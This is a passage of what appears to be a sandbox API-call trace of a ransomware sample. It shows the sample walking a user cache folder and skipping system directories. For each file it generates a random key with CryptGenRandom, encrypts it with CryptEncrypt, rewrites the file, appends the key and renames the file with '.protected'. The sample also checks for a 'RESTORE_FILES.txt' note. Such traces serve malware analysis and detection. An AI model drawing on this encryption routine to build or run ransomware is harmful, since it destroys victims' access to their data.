(lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="RESTORE_FILES.txt") returned -1 [0088.747] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.747] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.748] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 151 [0088.748] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".txt") returned 0x0 [0088.748] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 151 [0088.748] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".rar") returned 0x0 [0088.748] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 151 [0088.748] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".zip") returned 0x0 [0088.748] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5ed, lpOverlapped=0x0) returned 1 [0088.749] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.750] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5ed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5ed, lpOverlapped=0x0) returned 1 [0088.750] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.750] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.750] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.750] CloseHandle (hObject=0x150) returned 1 [0088.750] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.protected") returned 161 [0088.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc.protected")) returned 1 [0088.751] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.751] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="Windows") returned -1 [0088.751] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="Program Files") returned -1 [0088.751] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="Program Files (x86)") returned -1 [0088.751] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="$Recycle.bin") returned 1 [0088.751] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="System Volume Information") returned -1 [0088.751] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 151 [0088.751] StrStrIW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".protected") returned 0x0 [0088.751] lstrcmpW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="RESTORE_FILES.txt") returned -1 [0088.751] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.751] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 151 [0088.755] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".txt") returned 0x0 [0088.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 151 [0088.762] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".rar") returned 0x0 [0088.762] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 151 [0088.762] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".zip") returned 0x0 [0088.762] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.763] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.764] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.764] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.764] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.764] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.764] CloseHandle (hObject=0x150) returned 1 [0088.764] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.protected") returned 161 [0088.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873.protected")) returned 1 [0088.765] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.765] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="Windows") returned -1 [0088.765] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="Program Files") returned -1 [0088.765] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="Program Files (x86)") returned -1 [0088.765] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="$Recycle.bin") returned 1 [0088.765] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="System Volume Information") returned -1 [0088.765] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 151 [0088.765] StrStrIW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".protected") returned 0x0 [0088.765] lstrcmpW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="RESTORE_FILES.txt") returned -1 [0088.765] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.766] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.766] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 151 [0088.766] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".txt") returned 0x0 [0088.766] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 151 [0088.766] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".rar") returned 0x0 [0088.766] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 151 [0088.766] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".zip") returned 0x0 [0088.766] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.790] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.790] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.790] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.790] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.790] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.790] CloseHandle (hObject=0x150) returned 1 [0088.790] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.protected") returned 161 [0088.790] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce.protected")) returned 1 [0088.791] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.791] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="Windows") returned -1 [0088.791] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="Program Files") returned -1 [0088.791] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="Program Files (x86)") returned -1 [0088.792] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="$Recycle.bin") returned 1 [0088.792] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="System Volume Information") returned -1 [0088.792] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 151 [0088.792] StrStrIW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".protected") returned 0x0 [0088.792] lstrcmpW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="RESTORE_FILES.txt") returned -1 [0088.792] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.792] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.792] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 151 [0088.792] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".txt") returned 0x0 [0088.792] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 151 [0088.793] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".rar") returned 0x0 [0088.793] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 151 [0088.793] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".zip") returned 0x0 [0088.793] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.806] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.806] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.806] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.806] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.806] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.806] CloseHandle (hObject=0x150) returned 1 [0088.806] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.protected") returned 161 [0088.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf.protected")) returned 1 [0088.812] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.813] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="Windows") returned -1 [0088.813] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="Program Files") returned -1 [0088.813] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="Program Files (x86)") returned -1 [0088.813] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="$Recycle.bin") returned 1 [0088.813] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="System Volume Information") returned -1 [0088.813] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 151 [0088.813] StrStrIW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".protected") returned 0x0 [0088.813] lstrcmpW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="RESTORE_FILES.txt") returned -1 [0088.813] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.813] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 151 [0088.814] StrStrW 